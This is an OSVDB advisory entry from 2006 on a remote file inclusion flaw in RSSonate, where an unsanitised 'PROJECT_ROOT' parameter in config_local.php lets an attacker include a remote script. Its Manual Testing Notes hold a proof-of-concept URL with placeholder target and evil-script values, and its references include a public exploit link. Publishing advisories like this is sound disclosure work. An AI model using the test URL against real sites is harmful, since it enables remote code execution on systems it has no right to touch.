RSSonate config_local.php PROJECT_ROOT Variable Remote File Inclusion

2006-10-21T06:48:58
ID OSVDB:29935
Type osvdb
Reporter Kw3rLn(kw3rln@hotmail.com)
Modified 2006-10-21T06:48:58

Description

Vulnerability Description

RSSonate contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to config_local.php not properly sanitizing user input supplied to the 'PROJECT_ROOT' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

RSSonate contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to config_local.php not properly sanitizing user input supplied to the 'PROJECT_ROOT' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/Src/getFeed/inc/config_local.php?PROJECT_ROOT=[Evil_Script]

References:

Vendor URL: http://www.gocc.gov/groups/RI_SOS/software/sqltorss Secunia Advisory ID:22496 Related OSVDB ID: 29936 Related OSVDB ID: 29937 Related OSVDB ID: 29938 Related OSVDB ID: 29934 ISS X-Force ID: 29703 Generic Exploit URL: http://milw0rm.com/exploits/2605 FrSIRT Advisory: ADV-2006-4146 CVE-2006-5518 Bugtraq ID: 20654